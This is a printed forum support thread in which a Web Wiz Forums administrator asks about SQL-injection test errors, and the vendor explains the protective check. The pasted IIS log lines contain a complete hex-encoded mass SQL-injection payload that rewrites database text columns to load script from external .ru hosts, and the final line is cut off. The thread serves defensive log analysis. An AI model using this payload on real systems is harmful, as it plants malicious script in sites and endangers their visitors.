Web Wiz Forums - SqlInjectionTest

SqlInjectionTest

Printed From: Web Wiz Forums
Category: Web Wiz Web App Support Forums
Forum Name: Web Wiz Forums
Forum Description: Support forum for Web Wiz Forums application.
URL: https://forums.webwiz.net/forum_posts.asp?TID=26189
Printed Date: 03 April 2026 at 9:37am
Software Version: Web Wiz Forums 12.08 - https://www.webwizforums.com

Topic: SqlInjectionTest

Posted By: Nick-V
Subject: SqlInjectionTest
Date Posted: 30 August 2008 at 11:30am

I've just installed 9.51 with all logging enabled. I note the following:

2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() - -

I really welcome additional security but would like to know what is happening here? A guest cannot post so cannot inject? What is this test telling me?
Why are we seeing an internal IP address 192.168.xxx.xxx?

Replies:

Posted By: Nick-V
Date Posted: 30 August 2008 at 12:14pm

I am checking the forum log and the IIS log to try and determine exactly what is happening with some SQL injections and have provided info below that may be useful. My questions:

1) Does printer_friendly_posts.asp (and others) need to be protected...there was an attempt in the IIS log but nothing in the forum log?

2) Why do the two apparent attacks in the IIS log from 196.44.128.221 have an IP address in the forum log of 192.168.1 .196?

4 x SQL forum log entries (printer_friendly_posts.asp is missing)

2008-08-29 17:57:07 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_Server_SqlInjectionTest() - -

2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() - -

2008-08-29 19:06:51 - 189.20.218.142 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() - -

2008-08-29 23:06:27 - 200.96.213.185 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() - -

5 x IIS log entries

2008-08-29 16:57:08 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com - www.xxx.com 200 0 0 890 1628 359

2008-08-29 17:00:05 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com/ - www.xxx.com 200 0 0 890 1628 359

2008-08-29 17:57:30 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/printer_friendly_posts.asp TID=8163;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E326232342E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 67.233.178.228 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com/ - www.xxx.com 302 0 0 799 1456 234

2008-08-29 18:06:52 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E767377632E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 189.20.218.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - http://www.xxx.com/ - www.xxx.com 200 0 0 890 1445 578

2008-08-29 22:06:26 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474

Posted By: WebWiz-Bruce
Date Posted: 31 August 2008 at 8:36am

The SQL Injection test has been put in place mainly to reduce the impact of the current SQL Injection Virus which are very common at present.

Web Wiz Forums is already protected against SQL Injection. Any input used within an SQL Query is screened and any SQL removed. However attacks by these viruses do NOT course security issues in Web Wiz Forums thanks to the screening but the page will still load as normal using up bandwidth and server resources.

This test is run right at the beginning and just returns an error message, thus reducing your bandwidth consumption and server load when these viruses attack.

On some busy forums have seen as many as 40 attempts per second by these viruses attempting to inject malicious SQL into the forum, so having this extra precaution is useful for these forums to reduce the amount of resources consumed unnecessary by these virus attacks.

The IIS log file entries that you have included at the end of your post are from computers infected with an SQL Injection virus that attempted to inject malicious SQL into your forum.

To determine which pages are best protected and in what way have studied the log files of a number of large forums that come under regular attack from these viruses. The printer_friendly_posts.asp page does have this extra protection so make sure you have updated it to the latest release.

IP addresses maybe different in IIS log files to Web Wiz Forums as IIS stores the IP of proxy servers which can mean the IP is not always correct. Web Wiz Forums being written in ASP has to relie on the IP address contained in the HTTP header, which maybe altered to give an incorrect IP address.

-------------
https://www.webwiz.net/web-wiz-forums/forum-hosting.htm" rel="nofollow - Web Wiz Forums Hosting
https://www.webwiz.net/web-hosting/windows-web-hosting.htm" rel="nofollow - ASP.NET Web Hosting

Posted By: Nick-V
Date Posted: 31 August 2008 at 11:16am

Thanks for all the useful explanations about this new feature...

I replaced ALL files when I set up this version but I'll check the version of printer_friendly_posts.asp again - more likely the error predates the upgrade !

EDIT: I definately have the correct version installed and the log timestamps show that that everything was in place...I will monitor this.